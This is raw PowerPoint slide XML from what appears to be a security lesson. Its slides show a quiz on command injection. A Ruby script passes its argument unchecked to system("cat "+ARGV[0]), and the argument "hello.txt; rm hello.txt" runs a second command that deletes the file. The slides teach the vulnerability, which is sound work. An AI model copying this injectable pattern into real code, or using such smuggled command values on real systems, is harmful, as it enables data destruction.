              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but halted when it couldn’t find the second of these</a:t>
            </a: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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ARGV[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(only), which was then catted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDED07E-45CC-DE08-9E2A-6B7C722F6B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 429">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD48B997-E8AD-1340-1A1C-4A1FB1C36D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="3581510"/>
            <a:ext cx="11711538" cy="5684247"/>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sz="4000" b="1" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t> ARGV.length &lt; 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>  puts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"required argument: textfile path"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>  exit 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t># call cat command on given argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>+ARGV[0]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>exit 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 430">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D0291CC-4CEC-0C7F-A5AC-CD58A99E808C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="2900768"/>
            <a:ext cx="4498025" cy="82137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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" i="1" dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF12132D-0DDA-ADE3-A9B4-A5C3D57A21A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11038118" y="9698295"/>
            <a:ext cx="13149943" cy="2723823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299434760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D7726-A646-389F-1064-9EADE602EB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0FF40-609D-DFE9-6194-4CEABE7F1A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 2: What happened?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34570FE-A66F-D374-4AD5-DA36B04CFA90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069218" y="3134320"/>
            <a:ext cx="9555240" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>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dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was given a file named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which doesn’t exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> interpreted the string as having two commands, and executed them both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was given three files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but halted when it couldn’t find the second of these</a:t>
            </a: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dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ARGV[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(only), which was then catted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9B831B-873F-CC7E-C7B9-8700F10D6BFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 429">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDD98CB-11FA-A5F1-61C3-EE349A5F2190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="3581510"/>
            <a:ext cx="11711538" cy="5684247"/>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sz="4000" b="1" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t> ARGV.length &lt; 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" b="1" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>  puts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"required argument: textfile path"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>  exit 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t># call cat command on given argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>+ARGV[0]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0"/>
              <a:t>exit 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 430">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B25B53-022D-D23B-0223-2A9F8AA37404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11975780" y="2900768"/>
            <a:ext cx="4498025" cy="82137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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" i="1" dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA02B4D5-2FA8-4A57-30AB-8EE67BE2027E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11038118" y="9698295"/>
            <a:ext cx="13149943" cy="2723823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
